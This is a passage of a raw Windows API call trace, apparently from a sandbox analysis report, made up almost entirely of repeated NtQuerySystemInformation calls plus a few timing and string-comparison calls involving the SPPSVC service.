(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc40, Length=0x50, ResultLength=0x0) [0271.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb70, Length=0x38, ResultLength=0x0) [0271.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x28, ResultLength=0x0) [0271.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x28, ResultLength=0x0) [0271.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x28, ResultLength=0x0) [0271.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x28, ResultLength=0x0) [0271.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca10, Length=0x28, ResultLength=0x0) [0271.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb70, Length=0x38, ResultLength=0x0) [0271.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca90, Length=0x28, ResultLength=0x0) [0271.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca90, Length=0x28, ResultLength=0x0) [0271.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x20, ResultLength=0x0) [0271.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x20, ResultLength=0x0) [0271.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x20, ResultLength=0x0) [0271.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x20, ResultLength=0x0) [0271.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb70, Length=0x38, ResultLength=0x0) [0271.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb70, Length=0x38, ResultLength=0x0) [0271.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f0, Length=0x20, ResultLength=0x0) [0271.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x20, ResultLength=0x0) [0271.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x20, ResultLength=0x0) [0271.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x50, ResultLength=0x0) [0271.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x28, ResultLength=0x0) [0271.057] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x50, ResultLength=0x0) [0271.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x50, ResultLength=0x0) [0271.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbd0, Length=0x50, ResultLength=0x0) [0271.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb50, Length=0x28, ResultLength=0x0) [0271.058] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbd0, Length=0x50, ResultLength=0x0) [0271.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbd0, Length=0x50, ResultLength=0x0) [0271.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbd0, Length=0x50, ResultLength=0x0) [0271.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x38, ResultLength=0x0) [0271.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x28, ResultLength=0x0) [0271.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x28, ResultLength=0x0) [0271.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x28, ResultLength=0x0) [0271.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x28, ResultLength=0x0) [0271.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x38, ResultLength=0x0) [0271.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x28, ResultLength=0x0) [0271.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x28, ResultLength=0x0) [0271.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x38, ResultLength=0x0) [0271.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x20, ResultLength=0x0) [0271.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x20, ResultLength=0x0) [0271.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x20, ResultLength=0x0) [0271.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x20, ResultLength=0x0) [0271.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x38, ResultLength=0x0) [0271.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x20, ResultLength=0x0) [0271.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x20, ResultLength=0x0) [0271.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x20, ResultLength=0x0) [0271.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.067] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc751dfcc30 | out: lpSystemTimeAsFileTime=0xc751dfcc30*(dwLowDateTime=0x2d6585e, dwHighDateTime=0x1d5fb6f)) [0271.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x50, ResultLength=0x0) [0271.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc20, Length=0x28, ResultLength=0x0) [0271.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x50, ResultLength=0x0) [0271.067] GetTickCount () returned 0x118413d [0271.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca08, Length=0x58, ResultLength=0x0) [0271.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x38, ResultLength=0x0) [0271.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc750, Length=0x28, ResultLength=0x0) [0271.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc750, Length=0x28, ResultLength=0x0) [0271.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc750, Length=0x28, ResultLength=0x0) [0271.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc750, Length=0x28, ResultLength=0x0) [0271.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7c0, Length=0x28, ResultLength=0x0) [0271.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x38, ResultLength=0x0) [0271.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x28, ResultLength=0x0) [0271.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x28, ResultLength=0x0) [0271.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x38, ResultLength=0x0) [0271.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x20, ResultLength=0x0) [0271.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0271.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0271.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0271.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x38, ResultLength=0x0) [0271.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x20, ResultLength=0x0) [0271.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0271.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0271.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca08, Length=0x58, ResultLength=0x0) [0271.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0271.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x28, ResultLength=0x0) [0271.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x28, ResultLength=0x0) [0271.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x28, ResultLength=0x0) [0271.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x28, ResultLength=0x0) [0271.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x28, ResultLength=0x0) [0271.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0271.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0271.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x28, ResultLength=0x0) [0271.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x28, ResultLength=0x0) [0271.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0271.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0271.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x20, ResultLength=0x0) [0271.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0271.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0271.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0271.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x20, ResultLength=0x0) [0271.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0271.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x20, ResultLength=0x0) [0271.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0271.086] NtQuerySystemInformation (SystemInformationClass=0xb9, 